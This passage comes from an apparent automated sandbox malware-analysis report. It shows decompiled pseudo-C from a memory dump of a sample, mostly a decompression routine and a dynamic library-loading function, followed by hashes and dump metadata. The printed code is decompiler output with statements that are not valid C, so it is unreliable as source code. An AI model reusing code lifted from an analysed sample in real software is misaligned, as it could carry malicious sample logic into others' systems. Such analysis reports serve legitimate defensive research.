											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DA3(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409218);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405dab
0x00405dae
0x00405db5
0x00405dbd
0x00405dca
0x00000000
0x00405dd1
0x00405dc0
0x00405dc8
0x00000000
0x00000000
0x00405dd9

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
